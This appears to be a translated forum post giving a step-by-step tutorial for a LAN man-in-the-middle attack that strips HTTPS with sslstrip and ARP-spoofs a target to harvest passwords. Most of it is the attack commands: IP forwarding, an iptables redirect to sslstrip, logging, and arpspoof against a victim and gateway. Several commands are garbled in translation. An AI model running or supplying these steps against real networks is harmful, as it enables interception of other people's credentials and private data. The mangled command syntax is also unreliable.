Use sslstrip for man-in-the-middle attack (Bypass https)
Author: kevin2600
This is the first record of the November! This is a post I posted in anywlan before. Now I want to test it here! If you send an error, please correct it.
We all know that man-in-the-middle attacks on the Intranet allow attackers to more effectively intercept passwords and confidential information of Intranet users. Use the EtterCap or ArpSpoof tool in the BackTrack environment. however, Ettercap only applies to HTTP, FTP, Telnet, SMTP, and other protocols that are transmitted in plaintext. you cannot use OpenSSL for HTTPS ..... the software named sslstrip was released by an old hacker at the black hat 2009 Conference just held by US. This problem was solved by the change of image.
This software can be found in (http://www.thoughtcrime.org/software/sslstrip/index.html) text OK friends can also see his wonderful speech on Black hat. Because sslstrip is written in python, can run without installation.
The usage can be divided into the following steps:
1) run the echo "1">/proc/sys/net/ipv4/ip_forward command to switch your host to the forwarding mode.
2) use the command iptables-t nat-a prerouting-p tcp -- destination-port 80-j REDIRECT -- to-port 10000 to enable iptables to import all http data to sslstrip.
3) Run sslstrip-a-w ssllog (write text)
4) Run arpspoof-I eth0-t 192.168.1.15 (target) 192.168.1.1 (GATEWAY)
Wait patiently! ) The generated log file, such as ssllog, is actually in html format. you can open it with konquer, so that the target can be clearly viewed on the webpage. all of the above tests are completed in self-built LAN and BT3. this article is the first post of the younger brother. Please correct all the mistakes!
Kevin2600
Download:
Sslstrip-0.2.tar.gz